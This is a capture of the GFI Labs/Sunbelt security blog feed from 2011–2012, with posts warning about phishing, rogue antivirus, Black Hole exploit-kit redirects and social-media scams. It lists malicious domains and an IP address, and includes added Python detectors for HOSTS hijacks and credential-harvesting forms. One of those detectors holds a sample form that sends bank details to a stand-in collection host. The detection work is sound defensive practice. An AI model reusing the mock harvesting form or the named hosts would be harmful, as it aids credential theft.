Subscribe: Sunbelt Blog
http://sunbeltblog.blogspot.com/atom.xml
Preview: Sunbelt Blog

GFI LABS Blog

A blog about activities, products and ideas at GFI, one of the leading developers of security software to protect against spyware, spam and other threats.

Updated: 2016-06-29T02:56:03.552-04:00

Moving House

2012-01-16T01:33:33.032-05:00

Yes, we are :)

An inevitable move, this. After all, Sunbelt Software has been part of GFI Software for more than a year now.

This didn't happen overnight, though. We tip our hats to our colleagues in Malta who worked hard to put up our new home and brought the Labs under one domain. At the very least, you, dear Reader, are now spared the confusion of whether to call this website the "Sunbelt Blog" or the "GFI Blog" ;)

What you're reading here now is our 4,100th published post; it is also our last. We're just glad that our "Goodbye!" is short-lived.

Moving to a new home is just the start of better changes that are about to take place. To continue receiving the latest research and noteworthy information security news from us, we urge you to update your RSS to point to the new GFI Labs Blog feed.

Cheers to all of our avid readers! Chris and I will see you on the other side :)

Jovi Umawing



Phishers Use US-CERT Email Address as Bait

2012-01-12T03:59:51.336-05:00

The United States Computer Emergency Readiness Team (better known as US-CERT) is the latest bait used by phishers to get users to install malware on their systems.

US-CERT is a highly esteemed and trusted body of security professionals who tackle cybersecurity issues in the United States. They also work with security vendors to address vulnerabilities. With such impressive credentials, it is possible that some private organizations, as well as federal, state, and local governments, have fallen prey to this campaign, since they appear to be the targets.

From the US-CERT website: "Reports indicate that SOC@US-CERT.GOV is the primary email address being spoofed but other invalid email addresses are also being used.

"The subject of the phishing email is: "Phishing incident report call number: PH000000XXXXXXX" with the "X" containing an incident report number that varies.

"The attached zip file is titled "US-CERT Operation Center Report XXXXXXX.zip", with "X" indicating a random value or string. The zip attachment contains an executable file with the name "US-CERT Operation CENTER Reports.eml.exe", which is a variant of the Zeus/Zbot Trojan known as Ice-IX."


The complete report is found here.

Jovi Umawing



StalkTrak App gets Naked, Famous.

2012-01-12T00:00:40.695-05:00

(Embedded video: http://www.youtube.com/embed/WkWpx6bi0a8)

"No way" indeed.

The Naked and Famous were displaying the following Tweet on their feed earlier:


Visiting hampaw(dot)ru takes the end-user to tivvitter(dot)com/twitter_stalk-trak_app_user, where they are presented with an application install page for something called "StalkTrak":


The end-user can only progress to the next page if they enter both a username and a password - continuing past this screen will result in links to "StalkTrak" being sent to their followers.

Stalking apps are an old and tired scam dating back to the Myspace days, but unfortunately we continue to fall for them. Please steer clear of the above URL, and think twice before allowing any applications involving "Stalking" to access your Twitter account. You can always clean up your Twitter account here by revoking access to unwanted applications.

Christopher Boyd (Thanks to Jovi Umawing for assistance)



GFI's Take on What Online Crime Will be Like in 2012

2012-01-11T10:24:30.635-05:00

In a recent release of GFI Software's VIPRE report, GFI Labs revealed that recycled tactics from cybercriminals will not cease this new year. Modifications on these tactics will only be slight, and will depend greatly on the kind of targets these online criminals are aiming at. To quote Senior Threat Researcher Christopher Boyd: "Most cyber-attacks at any given time rely on old techniques deployed with a new disguise. The reason we see them again and again is quite simply because they work, and we anticipate 2012 to bring many fresh takes on old scams."

You can read more about this report here.

Jovi Umawing




Bogus Video Game Crack Leads to Rootkit

2012-01-11T01:07:22.390-05:00

Matthew, one of our malware researchers at the AV Labs, came upon a MediaFire link on a YouTube account that purports to direct users to a site where a crack code for the video game Pro Evolution Soccer 2012 (PES 2012) (otherwise known as World Soccer: Winning Eleven 2012) can be downloaded.


Of course, one doesn't need to go hunting for a YouTube page for the URL. Here it is: http://www(dot)mediafire(dot)com/?i1o0fsa9t5gvpld.

Users visiting the page can readily download and extract the compressed file Pro Evolution Soccer 2012 Keygen. It contains three files: an HTML file, a text file, and another compressed file, which holds the key generator application. The text file doesn't actually contain the password it claims to; instead, it contains a shortened URL that users must visit to get the password.


http://tinyurl(dot)com/64ad4m is actually http://lnkgt(dot)com/7RM, a survey page that users must answer before their password is given to them.


Unfortunately, after users fill in the survey and get the password needed to run the keygen, they inevitably end up installing malware on their systems. Not just any malware; it's a rootkit: ZeroAccess, a sophisticated rootkit known for overwriting critical OS files. Luckily, almost all AV vendors detect this one. Take a look.

Do note that the MediaFire URL is also mentioned on other website platforms that allow the embedding of video clips (such as the one below).


The more the URL is out there, the more likely someone can and will install the rootkit onto their systems. Stay safe, everyone!

Jovi Umawing (Thanks, Matthew)



2011: The Year that was for Facebook and Online Threats

2012-01-04T03:53:23.397-05:00

CommTouch, an Internet security service provider, has recently released its Internet Threats Trend Report for 2011. In this report, they highlight and analyze the various threats on Facebook that plagued users over the past year, such as social engineering ploys and the common methods of attack used. They also identify three ways criminals gain from targeting Facebook users and what those gains are used for. CommTouch provided an infographic (below) to present their analysis in a more coherent format.


The 19-page Internet Threats Trend Report covers malware and spam trends in Q4 of 2011. It also ranks the website categories most likely to house malware if compromised; sites tagged as Pornography are at #3. Other notable findings, in summary:
  • India, Vietnam, and Pakistan were the top three countries with the most zombie computers.
  • Phishers mostly targeted sites that were related to Games and Gaming.
  • In Q4, spammers used fake @gmail.com email addresses to trick users into responding to their spam messages.
The report can be downloaded here.

Jovi Umawing



Team Meat Spun Right Round

2012-01-01T21:17:47.227-05:00

"It's fine, trust me. I've done this stuff for a while now." Famous last words.

Team Meat, developers of Super Meat Boy, had a bit of an issue this past week when their Super Meat World database was compromised. This resulted in the game being broken and all user-created levels being deleted.

They were notified by a person in this thread on Twitter that access to their database was wide open, but the responses from the official Meat Boy account seemed to be a bit of a brush off in the eyes of some watching the drama unfold. Before you could say "This is going to go horribly wrong", it all went horribly wrong and login details were posted across various forums.

The Post-it note summary of events can be found here; a thread on the official forums lies this way, and if you'd rather take in the full horror of an entire game being put through the wood chipper then check out this blow-by-blow account. The game is now back up and running, but we have what may be the final game developer of 2011 to join the "Whoops, we were hacked" company of Sony, Square Enix, Steam, Nintendo, SEGA, Bethesda, EA, Codemasters, Epic and others.

Let's see if the trend continues in 2012, assuming the Mayans don't get us all first...

Christopher Boyd



Steam: All your coal are belong to us

2011-12-30T05:40:23.936-05:00

The rather awesome Steam gaming platform has a festive competition running at the moment - perform certain tasks in a selection of games drawn each day (or sign up to a few non-gaming activities like joining a forum, or linking your Steam and Facebook accounts) and receive a free random gift. I have to admit - I'm not doing very well so far.

That gift could be a redeemable coupon for a free game, a discount or... a lump of coal. All is not lost should you be handed a lump of coal - collect seven, and you can craft it into another randomly selected discount or free game.

This is, of course, where it all goes horribly wrong.

1) Gamers are exploiting the various "Indie Bundle" packs that go on sale periodically. This particular gaming bundle is a "pay what you want" affair, typically stuffed full of great games and additional offers should you pay a little extra (we still need to have that talk, Windows users). The latest Humble Indie Bundle went live not so long ago, and in a mad dash to create as much coal as possible to increase the chances of free games in Steam, gamers were paying the base amount for Indie Bundles, redeemable against Steam accounts.

From Platform Nation: "For just 1 penny you can nab yourself a Steam redeemable key, and make your account valid for entry in the Epic Giveaway and the freebie prizes. That means you can create 100 accounts for just $1"

Whoops. They must have really gone to town on that one, given that the mass purchasing caused the price of the bundle to drop by more than 25 cents.

Greedy gamers have also been targeting the "IndieGala Bundle", which gives a separate Steam account for each game - effectively five duplicate accounts for the lowest potential price of a penny. Once you've got your hands on all those wonderful discount coupons and free games, you can potentially gift them to your "main" account and sit upon a throne of murkily acquired titles.

2) With shades of Xbox achievement tampering, people are distributing save files / text files to unlock Steam game achievements needed to win coal / coupons. Here's an example of someone loading up a file not belonging to them, nabbing the required achievement in Binding of Isaac and getting their hands on a free game. That's kind of dreadful, and by "kind of" I mean "completely".

3) Gamers are firing up a Steam achievements modding tool to ensure they nab as much coal as possible.

Here's someone who clearly went on an "unlock all the things" rampage. As you can imagine, these antics are not proving popular with non-cheating gamers.

Coal farming isn't going unpunished, and Valve are starting to clamp down on anyone seen to be farming and / or exploiting. You may well be seeing many more examples like the below on forums, posted up by vaguely annoyed gamers who want their accounts reactivated:

If Valve catch you being naughty this festive season, they won't even leave you with coal. Top that, Santa...

Christopher Boyd



Hobbits and surveys: not a good combination

2011-12-22T01:50:12.842-05:00

It's not long since The Hobbit trailer made a lot of people very excited, and already we're seeing fake claims of "watch this movie online" leading to surveys.

For example:


You know the drill - fill in the survey to "view the content", then fail to be impressed by the total lack of content on offer. You'll either see nothing at all, or websites asking you to sign up to monthly fees. Don't fall for it!

Christopher Boyd (Thanks Robert)



Phishers are Back to Target Chase Clients

2011-12-20T06:53:52.643-05:00

Robert Stetson, one of our malware researchers at the AV Labs, found a new phishing scam in the wild.

The scam arrives as an email that directs users to the URL, data-server(dot)host(dot)org/email/protect/chase/.

After Chase clients provide their credentials into the fields of the purported legitimate bank page and click Log on, they are then directed to another UI where they are to enter their email address and its password.


Chase clients, please be duly warned about this. For the rest, please delete from your inbox doubtful mails that purport to come from banks (including yours). If you received an email from your bank about your account, confirm with them via customer service. You know what they say: better safe than sorry.

Jovi Umawing (Thanks to Robert)



"Curious Who's Stalking You?" - Yes, we've heard it before

2011-12-16T10:26:08.513-05:00

This social media "stalking" thing, to the best of my knowledge, all began on MySpace. We've seen them emerge on Twitter, too: our friends at Sophos wrote about a so-called "app" that Twitter purportedly released to track a user's stalker. Only this time, no such app is ever involved.

We've seen the tweet above pointing users to the URL canbin(dot)ru - a domain created just late last month. Once users click it, they are then directed to twvitter(dot)com/user_login-sessions/?timed_out=1. It's a phishing page.

There are two things we can take note of here: (1) the URL, which clearly tries to play tricks with our eyes (much like this one), and (2) the purported Twitter session that has timed out. Naturally, if one is logged onto Twitter and sees the message, they'll wonder for a second, and then unknowingly key in their user name and password anyway. Perhaps the only "error" we can see in this attack is that the site attempts to access the actual Twitter site the same way a real third-party app or site would, to make everything seem legit. However, Twitter requires tokens from such apps and sites. Since we know that this is a bogus page, it doesn't have a token; thus, it can't successfully redirect users to their actual accounts as it was supposed to.

We implore you, Dear Reader, to please exercise caution when clicking links in tweets. Even better: use your better judgment on whether you'd believe a supposedly interesting tweet or not before considering visiting the URL that goes with it. More often than not, scam tweets are designed to sound this way precisely to make Internet users click them. Please don't be fooled. Just like the "Girl Killed Herself" scam that made the rounds on Twitter not so long ago, this, too, will probably go down in history as a classic attack involving two social networking giants. This is not comforting news.

As long as users continue to fall for scams, they will just keep coming.

Jovi Umawing (Thanks to Chris for spotting this)



Protecting Against DDoS is Probably THE Best Holiday Gift to Give Your Company

2011-12-14T06:19:27.421-05:00

For those of us who rely on the Internet for news updates, Distributed Denial of Service (DDoS) attacks are a familiar sight. Anonymous being in the headlines continuously for months made this kind of online crime conspicuous, even ushering it unexpectedly into the mainstream.

DDoS attacks have been used not just by the aforementioned group but also by other groups and individuals for various reasons: making a stand for what they believe in, showing support for the beliefs of others, or doing it "just because". We can't deny that the companies that fell prey to DDoS attacks were huge and span many industries, but one cannot eliminate the very real possibility of small and medium-sized businesses being targeted as well.

Those whose businesses have an online presence are aware and worried, and if possible, they want to be protected from DDoS attacks. So how can this be done? InfoWorld published an article that tells business people just that. You can check it out here.

Jovi Umawing



Adblock Fuss

2011-12-13T13:47:33.293-05:00

I'm a big fan of Adblock Plus - it's a great add-on if you don't want to be hit over the head with any number of spinning, flashing adverts torn straight from the pages of Dante. However, an interesting change has been made to the program with the release of 2.0, and some users are up in arms about it:

"Adblock Plus has also been configured to allow non-intrusive advertising. You can change this selection at any time in the filter preferences."

Blasphemy? Madness? Sparta? Who knows, but we now have a situation where users aren't happy about the opt-in-by-default setting, or indeed about approving adverts in general no matter how limited the scope. There's a page on the Adblock Plus site that outlines some of the reasons for this change:

"You can allow some of the advertising that is considered not annoying. By doing this you support websites that rely on advertising but choose to do it in a non-intrusive way... In the long term the web will become a better place for everybody, not only Adblock Plus users. Without this feature we run the danger that increasing Adblock Plus usage will make small websites unsustainable."

As for why this is set live by default:

"If we ask users to enable this feature then most of them won't do it — simply because they never change any settings unless absolutely necessary. However, advertisers will only be interested in switching to better ways of advertising if the majority of Adblock Plus users has this feature enabled."

I'm not entirely convinced that advertisers so fond of flashy, spinning adverts from the back of beyond will tone their adverts down just because of this move - and hey, let's not forget that adverts meeting the requirements to be potentially given the green light ("static ads, text only, no attention grabbing images") can be just as dangerous, if not more so, than the flashy horrors still on the blocklist.

One good thing that may come out of this move is a possible reduction in infections. No really, hear me out.

I know a lot of people who have told me they never installed Adblock Plus or similar programs because their income was primarily driven by dedicated communities, and they wanted to put something back into those communities by not blocking their (static) advertisements. For example, a professional comic artist or writer is supported by their community; as a thank you, they won't block the adverts on the sites belonging to their fans or webcomic rings. As a result, quite a few of them were hit by drive-by installs and exploits while browsing the web with no ad blockers in place.

If the Adblock Plus team do a good job of this, it might actually encourage more people to try the program and let a few (hopefully harmless) adverts through, while using their new-found installs to block malicious adverts elsewhere with a clean conscience. That can only be a good thing. However, much will depend on their examination of the approved advert networks, their advertising methods, the kind of links those advertisers allow (and how they react to the bad apples that slip through the net) and whether or not the userbase approves of the opt-in-by-default setup.

We'll have to wait and see how this one plays out...

Christopher Boyd



Blackhole Exploit Hones in on Amazon Users

2011-12-13T10:14:35.402-05:00

Last week, our friends at ThreatPost posted about the ever-growing number of websites hosting the Black Hole Exploit Kit. Black Hole takes advantage of unpatched Windows operating systems. It also targets other software commonly installed on Windows platforms, such as Java and Adobe Reader. Since the kit is already available on the black market (for free), we can only expect more infections and news surrounding it.

And, oh: Facebook users should watch their backs, too.

Our malware researchers at the AV Labs, Robert and Matthew, have seen something in the wild that might spoil the holiday spirit a bit. It began as an email message supposedly from Amazon with the subject "Your Amazon.com order of Omron WXH-108F Fat Loss... has shipped".


Clicking any of the links in the email body directs users to jongerencentrumdebus(dot)nl/wp-content/uploads/fgallery/news.html, a likely compromised site, which then redirects to ageoloft(dot)info/main(dot)php?page=525447c096f8efbf, a known Black Hole Exploit Kit host.


The said ageoloft(dot)info site automatically downloads a .PDF file (an exploit) onto the system. This then exploits Adobe Reader to run malicious executables on the system. Furthermore, a worm, which GFI Software detects as Win32.Malware!Drop, is downloaded onto the system.

We detect the exploit page as Trojan.JS.Obfuscator.w (v); the PDF file that is part of the kit, Exploit.PDF-JS.Gen (v).

With the number of Internet users shopping online using services such as Amazon and eBay, it pays to be cautious fourfold, especially at this time of the year. Criminals know when and how users—you—spend their time there.

Jovi Umawing (Thanks to Robert and Matthew)



More bad ads in Bing, Yahoo search

2011-12-09T12:11:28.123-05:00

Another round of bad ads in Bing and Yahoo search are making an unwelcome return. Bing has fake Firefox adverts; Yahoo has fake Adobe Flash adverts instead, located at gripwise(dot)com(dot)au/player/. As you can see from the screenshot, the Gripwise URL where this is located appears to have been compromised.

Both sites will give you the Privacy Protection rogue, and the domain used for the fake Firefox download (ipropertyoffice(dot)com) has active exploits, so please steer clear. VirusTotal scores weigh in at 17/43, and we detect it as Win32.Malware!Drop.

At time of writing, Microsoft have been notified and have said the adverts have been pulled. All the same, be very careful when clicking on sponsored adverts for common downloads such as Firefox, Flash and others. As we've seen time and time again, scammers are all too eager to push malicious files on unsuspecting users.

Christopher Boyd (Thanks Matthew)



Holiday Horrors: food stamps, phish and PDFs

2011-12-07T20:24:41.449-05:00

Our monthly Top Ten threat detection report for the month of November is now available to take a look at, along with information on some of the scams we've seen these past few weeks including emails tempting users with infected PDF files, food stamp shenanigans involving mobile phone services and phishing emails containing HTML form attachments, some of which are still doing the rounds.

The Top Ten can be viewed here.



"For your protection, your Barclays account has been suspended..."

2011-12-07T20:08:12.962-05:00

If you see an email arrive in your mailbox with the above title, feel free to discard it - nothing good will come of it, unless your idea of "good" is "filling in all of your personal information into a fake banking webpage then sending it to a scammer."

The missive is sent from a free Yahoo email address, and works along the same line as these scam mails from a few weeks ago.


They claim your account has been suspended due to a large number of incorrect login attempts, and reactivation is a case of filling in the attached form before the 9th of December - otherwise your account will be disabled. With a fake time limit imposed on the customer, they open up the attached HTML form and see that it asks for an awful lot of information. Name, membership number, passcode, date of birth, mother's maiden name, address...


Of course it gets worse. Before you know it, our panicked bank customer is filling in their sort code, account number, telephone banking password and the three digit security code from the back of their card.


Once all of this is done, hitting the "Next" button submits the data to the scammer then redirects to the Barclays website. Please avoid mails such as the above and keep your money where it belongs - your bank will never email you asking for account information (and they certainly won't email you from a free webmail account!)

Christopher Boyd



"Steam Birthday" crashed by party poopers

2011-12-05T10:05:26.348-05:00

Here's a rather amateur phish targeting Steam users, located at steambirthday(dot)com. No birthday prizes for guessing what this scam is all about:


You know you're dealing with a special kind of phish when the opening ramble begins with "Steam is 3 years old: the Steam project started in 2003" and "In a really short time our servers became more and more and today there are more than a thousand meters of them".


According to the website, Valve - the creators of Steam - are giving away "1000 Gold accounts, which will allow you to play all 72 games for free" (Steam actually has 1,400+ titles available for download). Hitting the gold coloured "Upgrade now" button takes the end-user to a brilliantly convincing phish page. Or, to be more accurate, it takes them to missing images and screwed up HTML code:


The site is already flagged in Chrome as a phish page, and hopefully IE and others will follow suit soon. For now, let's hold off on the birthday celebrations.

Christopher Boyd



New Facebook Worm in the Wild

2011-11-29T05:40:18.935-05:00

Our friends at CSIS, a Danish security company, have spotted a worm spreading within the Facebook platform. In a recent news article penned by Peter Kruse, the worm is said to be "a classic" in terms of how it infects Internet users: it uses stolen credentials to log in to Facebook accounts and then spams contacts. The message is said to contain a link to a file purporting to be an image (a screenshot of the file shows it has a .JPG extension) but which is actually a malicious screensaver. Once run, it drops a cocktail of malicious files onto the system, including ZeuS, a popular Trojan spyware capable of stealing user information from infected systems.

The worm also has anti-VM capabilities, so it will not run, and therefore cannot be tested, in a virtual environment such as Oracle VM VirtualBox or VMware.

Please keep in mind that securing your information, including your social network credentials, is a must. Never blindly click links in messages sent by online contacts. Confirm with them that they actually sent the message before doing anything with it; otherwise, it is best to simply delete it from your inbox.

Jovi Umawing



FakeScanti Rogue Hijacks HOSTS Files

2011-11-28T17:48:11.449-05:00

Patrick, our resident rogue AV expert from the AV Labs, has his eyes set on one particular family: FakeScanti. This rogue family first appeared in the first quarter of 2010, and it has been on the radar ever since.

Enter AV Protection 2011.

This particular rogue is the latest variant in a handful of noteworthy rogues within the FakeScanti family. What's interesting about it is that it modifies the infected system's HOSTS file upon execution, a capability common to backdoors and worms. AV Protection 2011 directs users to 46(dot)4(dot)179(dot)109, a malicious IP in Germany where AV Secure 2012, another FakeScanti variant, is housed. It does this when users enter google.com, yahoo.com, bing.com, or facebook.com in the browser address bar.


Internet users can encounter this rogue if they are led, via search engine optimization (SEO) techniques or a spammed link, to a page that serves a Blackhole exploit kit with this rogue AV bundled in. We detect AV Protection 2011 as Trojan.Win32.FakeAV.IS (v). We can also detect and clean the modified HOSTS file.
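The HOSTS hijack described above is easy to check for from the defender's side. The following is an added example, not GFI's detection logic: it parses a HOSTS file and flags entries that point well-known domains at anything other than a loopback or sinkhole address; the sample file is constructed here, reusing the 46.4.179.109 address quoted in the post.

```python
"""Flag HOSTS-file entries that redirect well-known domains away from the local machine."""
import ipaddress

# Constructed sample modelled on the AV Protection 2011 behaviour described in the post:
# the rogue points popular domains at 46.4.179.109 (the IP quoted on the page).
SAMPLE_HOSTS = """\
# Copyright (c) 1993-2009 Microsoft Corp.
127.0.0.1       localhost
::1             localhost
46.4.179.109    google.com
46.4.179.109    www.google.com
46.4.179.109    yahoo.com
46.4.179.109    bing.com
46.4.179.109    facebook.com
0.0.0.0         ads.example.net   # a legitimate ad-blocking entry, not a hijack
"""

# Domains the rogue is reported to redirect; extend with banks etc. for the phishing case.
WATCHED_DOMAINS = {"google.com", "yahoo.com", "bing.com", "facebook.com"}


def parse_hosts(text):
    """Yield (ip, hostname, line_no) for every mapping, skipping comments and blank lines."""
    for line_no, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()   # strip trailing comments
        if not line:
            continue
        parts = line.split()
        if len(parts) < 2:
            continue
        try:
            ip = ipaddress.ip_address(parts[0])
        except ValueError:                     # malformed address, not a mapping
            continue
        for name in parts[1:]:                 # one IP may map several names
            yield ip, name.lower(), line_no


def is_sinkhole(ip):
    """Loopback (127.0.0.1, ::1) and unspecified (0.0.0.0) are the benign HOSTS targets."""
    return ip.is_loopback or ip.is_unspecified


def find_hijacks(text, watched=WATCHED_DOMAINS):
    """Return entries where a watched domain (or a subdomain of it) resolves off-box."""
    hits = []
    for ip, name, line_no in parse_hosts(text):
        if is_sinkhole(ip):
            continue
        base = name[4:] if name.startswith("www.") else name
        if base in watched or any(name.endswith("." + w) for w in watched):
            hits.append({"line": line_no, "host": name, "ip": str(ip)})
    return hits


def suspicious_targets(hits):
    """Group flagged hostnames by destination IP; one IP catching many brands is the rogue's signature."""
    by_ip = {}
    for hit in hits:
        by_ip.setdefault(hit["ip"], []).append(hit["host"])
    return by_ip


if __name__ == "__main__":
    hijacks = find_hijacks(SAMPLE_HOSTS)
    for hit in hijacks:
        print(f"line {hit['line']}: {hit['host']} -> {hit['ip']}")
    print(suspicious_targets(hijacks))
```

On a real system, read the file from %SystemRoot%\System32\drivers\etc\hosts (or /etc/hosts) and pass its contents to find_hijacks.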

As you may recall, this isn't the first time HOSTS files have been hijacked by criminals to dupe users. In one earlier case, phishers modified the HOSTS file to direct users to fake pages of popular banks, such as Bank of America and Citibank, whenever they keyed the legitimate bank URLs into the address bar.

Users are advised to be wary of clicking links in emails. If you didn't contact the party that sent such mails, it's always best to not bother yourself with them and delete them from your inbox. Be careful with how you do searches online as well, since the criminals behind rogue AV are still banking on the old yet very effective SEO technique.

Jovi Umawing (Thanks to Patrick)



"Così fan tutte"

2011-11-28T11:05:31.191-05:00

A company who make installers distributing the software of third parties recently contacted us to query a detection. As it turns out, their installer was not the problem - they were partnering with a company whose toolbar continues to have a history of misleading and deceptive installs.

The interesting part of all this was the discussion over how the programs caught the attention of the end-user in the first place. Here, it was big green download buttons on download sites that looked (for all intents and purposes) like the button the end-user should click on to begin their desired download. Instead, it would take them to vaguely named installer files. Examples of said buttons:

In response, the basic argument set forth was "We want to be clean, but it's so difficult when everybody else is doing whatever they can to snag an install over a company attempting to play by the rules". On the surface of it, this would seem to be the case - pre-ticked checkboxes, dubious installers and poor notification inside the programs we download are bad enough, but poor choice of advert placement (and adverts that themselves look like Facebook notification prompts and other elements that would fool a regular web user) muddy the waters still further. You can see these on everything from search engines to garden-variety adverts on any number of websites you care to mention, and as social networks continue to grow in influence, so too do 2.0-themed adverts continue to vie for your attention.

Disappointingly, the bulk of the case set forth boils down to "everyone else is doing it". Here are some of the examples they sent over:

Above you can see a rather large green tick and a "Download now" button which completely overwhelm the simple text link that happens to be the one the end-user is looking for.

The above example has a rather prominent (and unrelated) download banner at the top and another download link off to the right - personally I don't feel this has as strong a case as the first example, although three green download buttons on the same page is always going to cause confusion for somebody.

Above, we can see the actual download button fairly dwarfed by a larger one off to the right. Much like the other two, you can bet this has resulted in a number of "Wait, what?" style downloads.

None of this is new, of course - you can easily jump back to 2008 or earlier and see the same sort of thing taking place on Facebook application installer pages. It's worthwhile advising relatives you suspect will wander into these setups to be on their guard, because as far as many companies out there installing Adware and other products are concerned, it's a case of Così fan tutte.

Christopher Boyd (Thanks Eric)



"Rogue browsers will make a comeback on the mobile platform."

2011-11-24T11:42:59.403-05:00

We've seen it here first: YapBrowser has risen after being declared dead five years ago—and this discovery was made by Chris Boyd himself just a day before he presented at VB 2011 to discuss rogue browsers, of which YapBrowser is one.

If you missed the said conference or Chris's presentation, this podcast hosted by our friends at Help Net Security contains a comprehensive lightning talk from Chris about rogue browsers, their history, their numerous payloads, and the possibility of them plaguing smartphones.

Not long ago, our friends at Trend Micro spotted the first rogue browser for Windows Mobile, Symbian OS, and Android phones, disguised as Opera Mini, a popular Web browser for mobile phones. This could be the start of a new trend. What we're sure of is that fake browsers are still out there, even if under the radar and on different platforms.

Jovi Umawing



Phish for Thanksgiving?

2011-11-23T21:00:16.191-05:00

Over the previous few days, our research team here at GFI has noticed an uptick in bank phishes winding up in a few of our spam traps. This particular scam is unique in that it comes with an HTML file attachment which leads to a form that attempts to steal from the unsuspecting victim all types of identifying information, from the standard PIN and password to their Driver's License number and even a (fake) description of the last transaction made on the account.

(image)
As of this posting, we have seen e-mails targeting Bank of America and SunTrust customers and surely more will follow.

(image)
As always, please be wary of e-mails from financial institutions asking for identifying information. When in doubt, call the official phone number listed on the back of your credit card or the known customer service line for your bank.

So, while "fish" was likely a staple eaten during the days of the pilgrims, we here in the lab are going to stick to good ol' turkey this year.

Stay safe,

Robert Stetson
Malware Research Team
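A defender-side heuristic for the kind of attachment described above, added here as an example and not code from the original post or from GFI: it parses an HTML attachment and flags any single form that asks for several sensitive fields at once (PIN, password, licence number, last transaction). The attachment and the `verify.example` host are constructed samples.

```python
"""Heuristic check for credential-harvesting HTML attachments (added example)."""
from html.parser import HTMLParser

# Name fragments a bank would not ask for together in an e-mailed form.
# Matched against each field's name/id/placeholder; coarse on purpose
# (e.g. "pin" also hits "shipping"), so a threshold is applied below.
SENSITIVE = ("pin", "pass", "ssn", "social", "license", "licence",
             "account", "card", "cvv", "mother", "transaction")


class FormFieldCollector(HTMLParser):
    """Collects, per <form>, the action URL and the suspicious field labels."""

    def __init__(self):
        super().__init__()
        self.forms = []        # [{"action": str, "fields": [str, ...]}, ...]
        self._current = None   # form currently being parsed, if any

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action") or "", "fields": []}
            self.forms.append(self._current)
        elif tag in ("input", "select", "textarea") and self._current is not None:
            label = " ".join(filter(None, (a.get("name"), a.get("id"),
                                           a.get("placeholder")))).lower()
            if any(k in label for k in SENSITIVE):
                self._current["fields"].append(label)

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def suspicious_forms(html, threshold=3):
    """Return the forms asking for at least `threshold` distinct sensitive fields."""
    p = FormFieldCollector()
    p.feed(html)
    return [f for f in p.forms if len(set(f["fields"])) >= threshold]


# Constructed sample standing in for the attachment seen in the spam trap.
SAMPLE_ATTACHMENT = """<html><body><h1>Account verification</h1>
<form method="post" action="http://verify.example/collect.php">
 Card number <input name="cardnum">  PIN <input name="atm_pin" type="password">
 Online password <input name="password" type="password">
 Driver's License # <input name="drivers_license">
 Last transaction <input name="last_transaction">
 <input type="submit" value="Verify"></form></body></html>"""

if __name__ == "__main__":
    for f in suspicious_forms(SAMPLE_ATTACHMENT):
        print("suspicious form ->", f["action"], f["fields"])
```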



VIPRE Black Friday Special

2011-11-25T07:40:00.361-05:00

Here at GFI, we’re dedicated to providing quality antivirus software at exceptional values, and this Black Friday is no exception. Our Black Friday Sale features the biggest discounts of 2011 – up to 75% off.

Black Friday Sale

VIPRE Antivirus 2012 for $39.95 NOW $9.95!
VIPRE Internet Security 2012 for $49.95 NOW $19.95!

With prices this low, you can give the gift of PC security to Grandma, your sister, even that crazy uncle. Is Santa bringing a new laptop this year? Make sure he installs VIPRE on it first! It defends against viruses, worms, spyware, Trojans, rootkits and other Internet threats without slowing down your new (or old) PCs. The VIPRE 2012 editions feature the latest threat definitions and are easier to install and use than ever before.

This weekend’s VIPRE Black Friday Sale makes it easy and affordable to keep your family safe online this holiday season (and in years to come). So take advantage of the lowest prices of 2011 while the deals last.




From porn stars to strippers: careful with name games

2011-11-22T07:13:34.369-05:00

Way back in 2009, Sophos covered a bit of viral "fun" on Twitter where users of that service revealed their "porn star name" - comprised of your "first pet" and your "first street".

Well, look what's back in marginally altered form and racking up 8,000+ reblogs on Tumblr:

Click to Enlarge

Or, you know, don't. Stop and think how many services still ask for your pet name and street name on things such as password reset questions. Then pause to consider that an email address you use may be public facing, and have just such a question bolted onto it.

You may want to keep your clothes on and stick to the day job at that point...

Christopher Boyd